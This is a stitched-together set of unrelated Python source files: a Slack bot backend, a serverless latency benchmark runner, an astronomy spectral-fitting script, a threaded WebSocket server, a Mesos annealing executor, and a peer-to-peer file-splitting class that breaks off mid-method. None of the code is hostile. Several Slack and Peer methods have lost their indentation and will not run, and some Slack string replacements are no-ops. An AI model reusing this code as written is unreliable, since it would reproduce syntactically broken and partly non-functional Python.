        if hasattr(event, "kwargs"):
            data.update(event.kwargs)
            # Add slack-specific functionality
            if "color" in event.kwargs:
                # Wrap the text in a single colored attachment.
                data.update(
                    {
                        "attachments": json.dumps(
                            [
                                {
                                    "fallback": event.content,
                                    "color": self._map_color(event.kwargs["color"]),
                                    "text": event.content,
                                }
                            ]
                        ),
                    }
                )
            elif "attachments" in event.kwargs:
                data.update(
                    {
                        "text": event.content,
                        "attachments": json.dumps(event.kwargs["attachments"]),
                    }
                )
            else:
                data.update(
                    {
                        "text": event.content,
                    }
                )
        else:
            data.update(
                {
                    "text": event.content,
                }
            )
        data = self.set_data_channel_and_thread(event, data=data)
        # Auto-link mention names
        if "text" in data:
            if data["text"].find("<@") != -1:
                # NOTE(review): both replace() calls below are no-ops
                # (old == new); they were presumably entity unescapes
                # ("&lt;@" -> "<@", "&gt;" -> ">") mangled by an export —
                # confirm against upstream before relying on this path.
                data["text"] = data["text"].replace("<@", "<@")
                data["text"] = data["text"].replace(">", ">")
            if len(data['text']) > MAX_MESSAGE_SIZE:
                # Too long for a chat message: ship it as a text file instead.
                new_event = Event(
                    type='file.upload',
                    # Removes "code" markers from around the item and then makes it bytes
                    file=data['text'].strip('```').encode('utf-8'),
                    filename=getattr(event, 'filename', getattr(event, 'title', 'response')),
                    filetype=getattr(event, 'filetype', 'text'),
                    source_message=event.source_message,
                    kwargs=event.kwargs,
                )
                try:
                    self.send_file(new_event)
                except Exception:
                    logging.exception('Error sending file')
                return None
        elif "attachments" in data and "text" in data["attachments"][0]:
            # Same (no-op) mention fix-up applied inside the first attachment.
            if data["attachments"][0]["text"].find("<@") != -1:
                data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(
                    "<@", "<@"
                )
                data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(
                    ">", ">"
                )
        data.update(
            {
                "token": settings.SLACK_API_TOKEN,
                "as_user": True,
            }
        )
        if hasattr(event, "kwargs") and "html" in event.kwargs and event.kwargs["html"]:
            data.update(
                {
                    "parse": "none",
                }
            )
        return data
def send_message(self, event):
"Send a Slack message"
if event.content == "" or event.content is None:
# slack errors with no_text if empty message
return
data = self.get_event_data(event)
if data is None:
return
self.client._web_client.api_call( # pylint: disable=protected-access
"chat.postMessage", data=data
)
def open_direct_message(self, user_id):
"""Opens a DM channel."""
return self.client._web_client.api_call( # pylint: disable=protected-access
"conversations.open",
users=[user_id]
)['channel']['id']
    def update_message(self, event):
        """Post a message the first time it is seen, edit it thereafter.

        The Slack `ts` of the first post is cached in redis for an hour
        under the event's kwargs["update"] key; while cached, subsequent
        calls with the same key go through chat.update instead.
        """
        if event.content == "" or event.content is None:
            # slack errors with no_text if empty message
            return
        data = self.get_event_data(event)
        if data is None:
            return
        redis_key = f'slack_update_cache_{data["update"]}'
        if not hasattr(self, 'storage'):
            self.bootstrap_storage()
        timestamp = self.storage.redis.get(redis_key)
        if not timestamp:
            # First sighting: post normally and remember the message ts.
            result = self.client._web_client.api_call(  # pylint: disable=protected-access
                "chat.postMessage", data=data
            )
            if result.get('ts', None):
                self.storage.redis.set(redis_key, result['ts'], ex=3600)
            else:
                logging.error('Failure sending %s: %s', event, result.get('error', 'Unknown error'))
        else:
            # Known message: edit it in place.
            data['ts'] = timestamp
            result = self.client._web_client.api_call(  # pylint: disable=protected-access
                "chat.update", data=data
            )
            if result.get('ok', False) is False:
                logging.error('Failure updating %s: %s', event, result.get('error', 'Unknown error'))
@staticmethod
def _map_color(color):
"Turn colors into hex values, handling old slack colors, etc"
if color == "red":
return "danger"
if color == "yellow":
return "warning"
if color == "green":
return "good"
return color
def join_channel(self, channel_id):
"Join a channel"
return self.client._web_client.api_call( # pylint: disable=protected-access
"channels.join",
channel=channel_id,
)
@property
def people(self):
"References/initializes our internal people cache"
if not self._people:
self._update_people()
return self._people
@property
def default_channel(self):
"References/initializes our default channel"
if not self._default_channel:
self._decide_default_channel()
return self._default_channel
@property
def channels(self):
"References/initializes our internal channel cache"
if not self._channels:
self._update_channels()
return self._channels
    @property
    def client(self):
        "References/initializes our RTM client"
        # Lazily construct the client on first use. The reconnect path in
        # handle_outgoing_event does `del self._client` and then touches this
        # property to force a rebuild — NOTE(review): that only works if
        # `_client` has a class-level fallback of None; confirm where
        # `_client` is initialized.
        if self._client is None:
            self._client = RTMClient(
                token=settings.SLACK_API_TOKEN, run_async=False, auto_reconnect=True
            )
        return self._client
    def _decide_default_channel(self):
        "Selects a default channel"
        # Start pessimistic; we may not find anywhere we can post.
        self._default_channel = None
        self.people  # Set self.me # pylint: disable=pointless-statement
        # Prefer the configured default channel, if we're a member of it.
        if hasattr(settings, "SLACK_DEFAULT_CHANNEL"):
            channel = self.get_channel_from_name(settings.SLACK_DEFAULT_CHANNEL)
            if channel:
                if self.me.id in channel.members:
                    self._default_channel = channel.id
                    return
            elif not self.complained_about_default:
                # Complain only once per process about a bad config value.
                self.complained_about_default = True
                logging.error(
                    "The defined default channel(%s) does not exist!",
                    settings.SLACK_DEFAULT_CHANNEL,
                )
        # Fall back to any real channel we're a member of.
        # NOTE(review): no break here, so the LAST eligible channel wins —
        # confirm whether first-match was intended.
        for c in self.channels.values():
            if c.name != c.id and self.me.id in c.members:
                self._default_channel = c.id
        if not self._default_channel and not self.complained_uninvited:
            self.complained_uninvited = True
            logging.critical("No channels with me invited! No messages will be sent!")
    def _update_channels(self, client=None):
        "Updates our internal list of channels. Kind of expensive."
        channels = {}
        if client:
            # Page through every conversation type Slack will give us.
            for page in client.conversations_list(
                limit=self.PAGE_LIMIT,
                exclude_archived=True,
                types="public_channel,private_channel,mpim,im",
            ):
                for channel in page["channels"]:
                    # Keep only members we already know about from the
                    # people cache.
                    members = {}
                    for m in channel.get("members", list()):
                        if m in self.people:
                            members[m] = self.people[m]
                    channels[channel["id"]] = Channel(
                        id=channel["id"],
                        name=channel.get("name", channel["id"]),
                        source=clean_for_pickling(channel),
                        members=members,
                    )
        if len(channels.keys()) == 0:
            # Server isn't set up yet, and we're likely in a processing thread,
            # so fall back to the persisted cache when one exists.
            if self.load("slack_channel_cache", None):
                self._channels = self.load("slack_channel_cache", None)
        else:
            self._channels = channels
            self.save("slack_channel_cache", channels)
    def _update_people(self, client=None):
        "Updates our internal list of Slack users. Kind of expensive."
        people = {}
        if client:
            for page in client.users_list(limit=self.PAGE_LIMIT):
                for member in page["members"]:
                    # Deactivated accounts are skipped entirely.
                    if member["deleted"]:
                        continue
                    member_id = member["id"]
                    user_timezone = member.get("tz")
                    people[member_id] = Person(
                        id=member_id,
                        mention_handle=member.get("mention_handle", ""),
                        handle=member["name"],
                        source=clean_for_pickling(member),
                        name=member.get("real_name", ""),
                    )
                    # Remember which Person is the bot itself.
                    if member["name"] == self.handle:
                        self.me = people[member_id]
                    if user_timezone and user_timezone != "unknown":
                        people[member_id].timezone = user_timezone
        if len(people.keys()) == 0:
            # Server isn't set up yet, and we're likely in a processing thread,
            # so restore people/me/handle from the persisted cache.
            if self.load("slack_people_cache", None):
                self._people = self.load("slack_people_cache", None)
            if self.me is None:
                self.me = self.load("slack_me_cache", None)
            if self.handle is None:
                self.handle = self.load("slack_handle_cache", None)
        else:
            self._people = people
            self.save("slack_people_cache", people)
            self.save("slack_me_cache", self.me)
            self.save("slack_handle_cache", self.handle)
def _update_backend_metadata(self, **event):
"Updates all our internal caches. Very expenseive"
logging.debug("updating backend on event: %s", event)
name = event.get("data", dict()).get("self", dict()).get("name")
if name is not None:
self.__class__.handle = name
Thread(
target=self._update_people, args=(event["web_client"],), daemon=True
).start()
Thread(
target=self._update_channels, args=(event["web_client"],), daemon=True
).start()
    def _watch_slack_rtm(self):
        "This is our main loop."
        # The decorators don't work on unbound methods. Sigh.
        # These are all events that should spark an update of our inventory
        RTMClient.run_on(event="open")(self._update_backend_metadata)
        RTMClient.run_on(event="channel_added")(self._update_backend_metadata)
        RTMClient.run_on(event="user_changed")(self._update_backend_metadata)
        # This just handles messages
        RTMClient.run_on(event="message")(self.handle_incoming_slack_event)
        # Blocks here servicing the RTM websocket.
        self.client.start()
def handle_incoming_slack_event(self, **kwargs):
"Event handler"
logging.debug("Handling incoming event: %s", kwargs)
self.handle_incoming_event(kwargs["data"])
    def bootstrap(self):
        "This is Wills Process entry point for connecting to a backend"
        # Bootstrap must provide a way to to have:
        # a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
        # b) any necessary threads running for a)
        # c) self.me (Person) defined, with Will's info
        # d) self.people (dict of People) defined, with everyone in an organization/backend
        # e) self.channels (dict of Channels) defined, with all available channels/rooms.
        #    Note that Channel asks for members, a list of People.
        # f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
        #    with a maximum lag of 60 seconds.
        # NOTE: despite the attribute name, the RTM watcher runs in a
        # separate OS *process*, not a thread.
        self.rtm_thread = Process(target=self._watch_slack_rtm, daemon=False)
        self.rtm_thread.start()
def terminate(self):
"Exit gracefully"
if self.rtm_thread is not None:
self.rtm_thread.terminate()
while self.rtm_thread.is_alive():
time.sleep(0.2)
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i, results, loopTimes):
    """Run the benchmark script once for client `i`, storing its raw output."""
    print("client %d start" % i)
    pipe = os.popen("./single-cold_warm.sh -R -t " + str(loopTimes))
    # read() blocks until the benchmark run finishes.
    results[i] = pipe.read()
    print("client %d finished" % i)
def warmup(i, warmupTimes, actionName, params):
    """Invoke the action `warmupTimes` times to warm containers for client i.

    The output of each invocation is drained (so we block until the
    invocation completes) and discarded.
    """
    for _ in range(warmupTimes):
        pipe = os.popen("wsk -i action invoke %s %s --result --blocking" % (actionName, params))
        # Drain and close the pipe; the original bound the output to an
        # unused variable and never closed the handle.
        pipe.read()
        pipe.close()
    print("client %d warmup finished" % i)
def main():
    """Drive the concurrent benchmark: warm up, fan out clients, report.

    Reads (clientNum, loopTimes, warmupTimes) from argv, stops any stale
    containers, warms the action, runs the clients in threads, then writes
    result.csv and a formatted summary.
    """
    argv = getargv()
    clientNum = argv[0]
    loopTimes = argv[1]
    warmupTimes = argv[2]
    threads = []
    containerName = "arraySum_chained"
    actionName = "arraySum_sequence"
    params = "--param n 0"
    # Kill any lingering containers so every run starts cold.
    r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
    r.read()
    # First: warm up
    for i in range(clientNum):
        t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
        threads.append(t)
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    print("Warm up complete")
    # Second: invoke the actions
    # Initialize the results and the clients
    threads = []
    results = []
    for i in range(clientNum):
        results.append('')
    # Create the clients
    for i in range(clientNum):
        t = threading.Thread(target=client,args=(i,results,loopTimes))
        threads.append(t)
    # start the clients
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    # NOTE(review): result.csv is never explicitly closed/flushed; it relies
    # on interpreter exit.
    outfile = open("result.csv","w")
    outfile.write("invokeTime,endTime\n")
    latencies = []
    minInvokeTime = 0x7fffffffffffffff
    maxEndTime = 0
    for i in range(clientNum):
        # get and parse the result of a client
        clientResult = parseResult(results[i])
        # print the result of every loop of the client
        for j in range(len(clientResult)):
            outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
            # Collect the latency
            latency = int(clientResult[j][-1]) - int(clientResult[j][0])
            latencies.append(latency)
            # Find the first invoked action and the last return one.
            if int(clientResult[j][0]) < minInvokeTime:
                minInvokeTime = int(clientResult[j][0])
            if int(clientResult[j][-1]) > maxEndTime:
                maxEndTime = int(clientResult[j][-1])
    formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
    """Extract (invokeTime, endTime) timestamp pairs from a client's output.

    Each relevant line contains up to two 13-digit millisecond timestamps;
    we scan for the first digit of each and slice 13 characters.

    Arguments:
      result: multi-line stdout captured from single-cold_warm.sh.
    Returns:
      list of [invokeTime, endTime] string pairs ('' when missing).
    """
    parsedResults = []
    for line in result.split('\n'):
        if line.find("invokeTime") == -1:
            continue
        parsedTimes = ['', '']
        i = 0
        count = 0
        # Single bounded scan. The original nested an inner position loop
        # inside `while count < 2`, which spun forever when a malformed
        # line held fewer than two timestamps.
        while i < len(line) and count < 2:
            if line[i].isdigit():
                parsedTimes[count] = line[i:i + 13]
                i += 13
                count += 1
            else:
                i += 1
        parsedResults.append(parsedTimes)
    return parsedResults
def getargv():
    """Read and validate command-line arguments.

    Returns (clientNum, loopTimes, warmupTimes); warmupTimes defaults to 1.
    Exits on misuse.
    """
    usage = "Usage: python3 run.py <client number> <loop times> [<warm up times>]"
    if len(sys.argv) not in (3, 4):
        print(usage)
        exit(0)
    clients, loops = sys.argv[1], sys.argv[2]
    if not (clients.isdigit() and loops.isdigit()) or int(clients) < 1 or int(loops) < 1:
        print(usage)
        print("Client number and loop times must be an positive integer")
        exit(0)
    if len(sys.argv) == 4:
        warm = sys.argv[3]
        if not warm.isdigit() or int(warm) < 1:
            print(usage)
            print("Warm up times must be an positive integer")
            exit(0)
        return (int(clients), int(loops), int(warm))
    return (int(clients), int(loops), 1)
def formatResult(latencies, duration, client, loop, warmup):
    """Print and append percentile/throughput statistics for a run.

    Arguments:
      latencies: per-request latencies in milliseconds (sorted in place).
      duration: total wall-clock time of the run in milliseconds.
      client, loop, warmup: run parameters, echoed into the log.
    """
    requestNum = len(latencies)
    latencies.sort()
    duration = float(duration)
    total = sum(latencies)
    print("\n")
    print("------------------ result ---------------------")
    averageLatency = float(total) / requestNum
    # Nearest-rank percentiles: 1-based index into the sorted list.
    _50pcLatency = latencies[int(requestNum * 0.5) - 1]
    _75pcLatency = latencies[int(requestNum * 0.75) - 1]
    _90pcLatency = latencies[int(requestNum * 0.9) - 1]
    _95pcLatency = latencies[int(requestNum * 0.95) - 1]
    _99pcLatency = latencies[int(requestNum * 0.99) - 1]
    print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
    print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
    print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
    # output result to file — use a context manager so the log is flushed
    # and closed (the original leaked the file handle).
    with open("eval-result.log", "a") as resultfile:
        resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
        # "warup_times" typo fixed in the log label.
        resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
        resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
        resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
        resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
        resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main() |
spectral.py | import cluster
import argparse
import multiprocessing as mp
import numpy as np
import time
import pypeline_io as io
def get_arguments():
    """Build and parse the command-line options for the spectral stage."""
    help_str = """
    pypeline help string
    """
    prog = 'pypeline'
    max_cpu = mp.cpu_count()
    # logger.debug("Getting commandline arguments.")
    arg_parser = argparse.ArgumentParser(description=help_str, prog=prog)
    arg_parser.add_argument("--cluster_config_file", "-c", dest="cluster_config",
                            action="store", default=None,
                            help="Points to the cluster config file")
    arg_parser.add_argument("--parallel", "-p", dest="parallel",
                            action="store_true", default=False,
                            help='Run in parallel (default False)')
    arg_parser.add_argument("--num_cpus", "-n", dest="num_cpus",
                            action="store", default=max_cpu, type=int,
                            help="Number of CPUs to use in the fitting process. "
                                 "Default is max number of cpus available ({} for "
                                 "this system.)".format(max_cpu))
    arg_parser.add_argument("--continue", dest='cont',
                            action='store_true', default=False,
                            help='Continue an unfinished run')
    arg_parser.add_argument("--resolution", "-r", dest='resolution',
                            action='store', default=2, type=int,
                            help='Generate a low, medium, or high resolution temperature map. Low = 1, Med = 2, High = 3. '
                                 'High resolution is a fit for every pixel, medium pixels are 3x3, low pixels are 5x5.')
    arg_parser.add_argument("--dev-mtpc", dest='dev_mtpc', type=int, action="store",
                            default=0, help="Max Task Per Child sent to mp.Pool()")
    return arg_parser.parse_args()
def print_stage_tmap_prep(cluster: cluster.ClusterObj):
    """Print next-step instructions once spectral fitting is ready.

    NOTE(review): the parameter name shadows the imported `cluster` module;
    the annotation still resolves because it is evaluated at def time.
    """
    prep_str = """Now ready for spectral fitting.
    If offloaded, copy the spectral fits file, {spectral_fits},
    back to the local machine.
    Next, run
        python acb.py --temperature_map --resolution 2 --cluster_config_file /path/to/cluster/A115/A115_pypeline_config.ini
    This will create the temperature map and allow for the creation of the pressure maps.""".format(
        spectral_fits=cluster.spec_fits_file
    )
    print(prep_str)
def print_iteration_string(start_time, iteration, total):
    """Print run progress (elapsed / per-iteration / remaining time) in red.

    Arguments:
      start_time: epoch seconds when the run began.
      iteration: 0-based index of the current iteration.
      total: total number of iterations.
    """
    try:
        elapsed = time.time() - start_time
        time_elapsed_str = time.strftime("%H hours %M minutes %S seconds",
                                         time.gmtime(elapsed))
        time_per_iteration = elapsed/iteration
        time_per_iteration_str = time.strftime("%H hours %M minutes %S seconds",
                                               time.gmtime(time_per_iteration))
        time_remaining = time_per_iteration * (total-iteration)
        time_remaining_str = time.strftime("%H hours %M minutes %S seconds",
                                           time.gmtime(time_remaining))
        io.print_red("\n*********************************\n")
        # BUG FIX: use the parameters instead of the module-level globals
        # `i` and `num_region_lists`, which only exist when run as a script.
        io.print_red("Iteration {} of {}".format(iteration + 1, total))
        io.print_red("Time elapsed: {elapsed}".format(elapsed=time_elapsed_str))
        io.print_red("Approximate time per iteration: {}".format(time_per_iteration_str))
        io.print_red("Approximate time remaining: {}".format(time_remaining_str))
        io.print_red("\n*********************************\n")
    except ZeroDivisionError:
        # First iteration (iteration == 0): no per-iteration average yet.
        io.print_red("\n*********************************\n")
        io.print_red("Iteration {} of {}".format(iteration + 1, total))
        io.print_red("\n*********************************\n")
if __name__ == '__main__':
    args = get_arguments()
    if args.cluster_config is not None:
        clstr = cluster.read_cluster_data(args.cluster_config)
        if args.cont:
            # Resume: fit only the regions a previous run didn't finish.
            print("Continuing spectral fits")
            regions = clstr.unfinished_regions_to_fit(args.resolution)
            original = len(clstr.scale_map_regions_to_fit(args.resolution))
            print('{reg} of {orig} regions left to fit.'.format(
                reg=len(regions),
                orig=original)
            )
        else:
            # Fresh run: reset the fit-output files first.
            clstr.initialize_best_fits_file()
            clstr.initialize_worst_fits_file()
            clstr.initialize_all_fits_file()
            regions = clstr.scale_map_regions_to_fit(args.resolution)
        print("Regions to fit: {reg}".format(reg=len(regions)))
        start_time = time.time()
        num_regions = len(regions)
        if args.parallel:
            # Split the regions into batches of ~num_cpus and run each
            # batch as a set of worker processes.
            num_region_lists = (num_regions//args.num_cpus)+1
            region_lists = np.array_split(regions, num_region_lists)
            print("Starting {} iterations with ~{} fits per iteration.".format(len(region_lists), len(region_lists[0])))
            for i, small_region_list in enumerate(region_lists):
                print_iteration_string(start_time, i, num_region_lists)
                processes = [mp.Process(target=clstr.fit_region_number, args=(region,)) for region in small_region_list]
                for process in processes:
                    process.start()
                for process in processes:
                    process.join()
        else:
            # Sequential fallback with a progress line every 10 regions.
            num_regions = len(regions)
            counter = 0
            for region in regions:
                # NOTE(review): "pix2pix" in this message looks like a
                # copy-paste leftover — the call fits a spectral region.
                print("Running pix2pix on region {region}".format(region=region))
                clstr.fit_region_number(region)
                counter += 1
                if counter % 10 == 0 or counter == num_regions:
                    print("{} of {} regions complete".format(counter, num_regions))
        time_elapsed = time.strftime("%H hours %M minutes %S seconds.",
                                     time.gmtime(time.time() - start_time))
        print("Time elapsed: {}.".format(time_elapsed))
        print_stage_tmap_prep(clstr)
|
web_socket_server.py | # -*- coding: utf-8 -*-
import socket
import ssl
from queue import Empty, Queue
from threading import Thread

from web_socket import WebSocket
class WebSocketServer:
    """Threaded WebSocket server.

    A listener thread accepts TCP (optionally TLS) connections, wraps each
    in a WebSocket, and parks it on a queue; worker threads repeatedly pull
    sockets off the queue, poll them for data, and put live ones back.
    """

    def __init__(self, listen_ip, port, ping_interval_seconds=20, ping_pong_keep_alive_interval=3, debug=False,
                 cert_file=None, key_file=None):
        # State is per-instance now; it previously lived in class attributes,
        # which made every server instance share one queue/thread list.
        self.threads = []
        self.exit_scheduled = False
        self.queue = Queue()
        self.server_socket = socket.socket()
        if cert_file and key_file:
            # ssl.wrap_socket() was deprecated and removed in Python 3.12;
            # an SSLContext provides the same server-side TLS wrapping.
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_cert_chain(certfile=cert_file, keyfile=key_file)
            self.server_socket = context.wrap_socket(self.server_socket, server_side=True)
        self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server_socket.bind((listen_ip, port))
        self.ping_interval_seconds = ping_interval_seconds
        self.ping_pong_keep_alive_interval = ping_pong_keep_alive_interval
        self.debug = debug

    def listen(self):
        """
        Listens for connections until exit_scheduled is true. Connections are added to the queue on connect.
        """
        # Non-blocking accept so the loop can notice exit_scheduled.
        self.server_socket.setblocking(False)
        self.server_socket.listen()
        while not self.exit_scheduled:
            try:
                conn, address = self.server_socket.accept()
                if self.debug:
                    print('Connection attempt received at ' + address[0])
                self.queue.put(WebSocket(conn, ping_interval_seconds=self.ping_interval_seconds,
                                         ping_pong_keep_alive_interval=self.ping_pong_keep_alive_interval,
                                         debug=self.debug))
            except socket.error:
                pass  # no connection yet

    def worker(self, func):
        """
        Function that loops and calls single_action until exit_scheduled is true.
        :param func: Function to be called on message and connection when data is received.
        """
        while not self.exit_scheduled:
            self.single_action(func)

    def single_action(self, func):
        """
        Listens to a socket, does nothing if no data is received. Calls the given function on the message and socket
        if data was received.
        :param func: The function to be called with the message and socket.
        """
        # Use a timeout so workers wake up and notice exit_scheduled; a
        # bare queue.get() blocked forever and made stop() hang.
        try:
            c = self.queue.get(timeout=0.5)
        except Empty:
            return
        try:
            msg = c.recv()
            if msg:
                func(msg, c)
        except socket.error:
            # no data received yet
            pass
        # Dead sockets are simply not requeued, dropping the connection.
        if c.is_alive:
            self.queue.put(c)

    def start(self, func, worker_thread_count=5):
        """
        Starts the server
        :param func: The function to be called when a message is received. This function takes a msg object, which is
        the decoded payload of the bytes received, and a connection-object, which is the socket that received the
        message. This function calls the listen-method
        :param worker_thread_count: Number of threads to use as worker-threads.
        """
        # Track every thread so stop() can actually join them (previously
        # nothing was ever appended to self.threads).
        listener = Thread(target=self.listen)
        listener.start()
        self.threads.append(listener)
        if self.debug:
            print('Starting connection handlers')
        for _ in range(worker_thread_count):
            t = Thread(target=self.worker, args=(func,))
            t.start()
            self.threads.append(t)

    def stop(self):
        """
        Stops the server by telling the workers to stop, and waiting for them to do so.
        """
        self.exit_scheduled = True
        if self.debug:
            print('Stopping server...')
        for t in self.threads:
            t.join()
        # Release the listening port once all threads are down.
        self.server_socket.close()
|
__init__.py | import sys
import threading
import json
import traceback
from importlib import import_module
import mesos.interface
from mesos.interface import mesos_pb2
from pyrallelsa import group_runner
from pyrallelsa import ProblemClassPath
from enrique.package import get_package
class Enrique(mesos.interface.Executor):
    """Mesos executor (Python 2) that runs pyrallelsa annealing tasks.

    Each launched task carries JSON describing either a 'divisions'
    request (split a problem into work units) or an 'anneal' request
    (run the annealing and report the best solution); results go back
    to the scheduler via TaskStatus updates.
    """
    def registered(self, driver, executorInfo, frameworkInfo, slaveInfo):
        print "Executor registered"
    def disconnected(self, driver):
        print "Executor disconnected"
    def launchTask(self, driver, task):
        # Create a thread to run the task. Tasks should always be run in new
        # threads or processes, rather than inside launchTask itself.
        def run_task():
            try:
                print "Running task %s" % task.task_id.value
                # Tell the scheduler we've started.
                update = mesos_pb2.TaskStatus()
                update.task_id.value = task.task_id.value
                update.state = mesos_pb2.TASK_RUNNING
                update.data = 'task running'
                driver.sendStatusUpdate(update)
                print task.data
                task_data = json.loads(task.data)
                uid = task_data['uid']
                problem_name = task_data['name']
                task_command = task_data['command']
                problem_data = task_data['problem_data']
                problem_data_str = json.dumps(problem_data)
                # Fetch the problem package and make its "problem" module
                # importable from this process.
                package = get_package(problem_name)
                sys.path.append(package.problem_path)
                pccls_module = import_module("problem")
                PCCls = getattr(pccls_module, "Problem")
                pcp = ProblemClassPath("problem", "Problem")
                if task_command == 'divisions':
                    # Split the problem into the requested number of units.
                    task_divisions = task_data['divisions']
                    res = list(PCCls.divide(
                        divisions=task_divisions,
                        problem_data=problem_data
                    ))
                    res_data = {
                        "divisions": res
                    }
                elif task_command == 'anneal':
                    minutes_per_division = task_data['minutes_per_division']
                    sstates = task_data['sstates']
                    solutions = group_runner((
                        uid, pcp, sstates,
                        minutes_per_division,
                        problem_data_str, None))
                    # Lowest energy wins.
                    winner = sorted(
                        (solution for solution in solutions),
                        key=lambda s: s.energy
                    )[0]
                    res_data = {
                        "best_location": winner.state,
                        "fitness_score": winner.energy
                    }
                else:
                    raise ValueError("Invalid task_command {}"
                                     .format(task_command))
                # Report success with the JSON-encoded result payload.
                update = mesos_pb2.TaskStatus()
                update.task_id.value = task.task_id.value
                update.state = mesos_pb2.TASK_FINISHED
                res_dict = dict(uid=uid)
                res_dict.update(res_data)
                update.data = json.dumps(res_dict)
                driver.sendStatusUpdate(update)
            except:
                # NOTE(review): bare except is deliberate here — any failure
                # is reported to the scheduler as TASK_FAILED with the full
                # traceback in the payload.
                stacktrace = "".join(
                    traceback.format_exception(*sys.exc_info())
                )
                sys.stderr.write(stacktrace+'\n')
                update = mesos_pb2.TaskStatus()
                update.task_id.value = task.task_id.value
                update.state = mesos_pb2.TASK_FAILED
                res_dict = {"error": stacktrace}
                update.data = json.dumps(res_dict)
                driver.sendStatusUpdate(update)
        thread = threading.Thread(target=run_task)
        thread.start()
    def killTask(self, driver, taskId):
        # Acknowledge the kill, then exit the executor process.
        update = mesos_pb2.TaskStatus()
        update.task_id.value = taskId.value
        update.state = mesos_pb2.TASK_KILLED
        res_dict = {"message": "Killed on request from the scheduler"}
        update.data = json.dumps(res_dict)
        # Send update, then die
        driver.sendStatusUpdate(update)
        raise SystemExit(res_dict['message'])
    def frameworkMessage(self, driver, message):
        # Send it back to the scheduler.
        driver.sendFrameworkMessage(message)
def main():
    """Entry point: run the Enrique executor under a Mesos driver (Python 2)."""
    import mesos.native
    print "Starting executor"
    driver = mesos.native.MesosExecutorDriver(Enrique())
    # Exit 0 only when the driver stopped cleanly.
    sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
main.py | from crypto import *
import threading
import socket
import struct
import time
import json
import uuid
import ast
import sys
import os
class Peer(threading.Thread):
    def __init__(self, host, port, dataDir='storage', maxpeers=100, maxfilesize=10*(10**10), maxnumfiles=200):
        """Bind a listening TCP socket and index the local data directory.

        @ host/port: address to listen on.
        @ dataDir: directory for stored file chunks (created if missing).
        @ maxpeers: used as the listen() backlog.
        @ maxfilesize / maxnumfiles: limits recorded here but not enforced
          in this constructor.
        """
        super(Peer,self).__init__()
        self.host = host
        self.port = int(port)
        self.maxpeers = int(maxpeers)
        # Normalize to a trailing slash; paths are built by concatenation.
        self.dataDir = dataDir if dataDir.endswith('/') else dataDir+'/'
        if not os.path.exists(self.dataDir):
            os.makedirs(self.dataDir)
        self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind((self.host, self.port))
        self.socket.listen(self.maxpeers)
        self.peers = []  # known (host, port) tuples
        self._lock = threading.Lock()  # guards mutation of self.peers
        self.files = self.getfilelist()[1]  # content hash -> filename
        self.maxfilesize = maxfilesize
        self.numfiles = len(self.files)
        self._shutdown = False
        self.sent_split_files = {}  # file hash -> {chunk hash: peer}
def split_send_file(self,path):
peers = self.get_active_peers()
plen = len(peers)
size = os.path.getsize(path)
chunk = int(size/plen)
cmd = "{'type':'FILEUP'}"
cmdlen = len(cmd)
addMod = size % plen
x = True
d = {}
with open(path,'rb') as f:
for i in peers:
c = self.create_client_sock()
c.connect(i)
c.send(struct.pack('!L',cmdlen))
c.send(struct.pack('!{}s'.format(cmdlen), cmd.encode()))
if x:
b=xor(f.read(chunk+addMod))
d[hash(b)]=i
c.send(struct.pack('!L', chunk+addMod))
c.send(b)
c.close()
x = False
else:
b=xor(f.read(chunk+addMod))
d[hash(b)]=i
c.send(struct.pack('!L', chunk))
c.send(b)
c.close()
self.sent_split_files[file_hash(path)] = d
def create_client_sock(self):
clientsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return clientsock
def get_active_peers(self):
query = "{'type':'PING'}"
l = len(query)
tmp = []
for i in self.peers:
d=self.sendtopeer(i,query)
if struct.unpack('!4s',d)[0].decode() == 'PONG':
tmp.append(i)
return tmp
def getfilelist(self):
f = os.listdir(self.dataDir)
d = {}
for i in f:
d[file_hash(self.dataDir+i)] = i
return len(str(d)),d
def recv_split_file(self,h,path):
peers = self.sent_split_files[h]
with open(path,'wb') as f:
for i in peers:
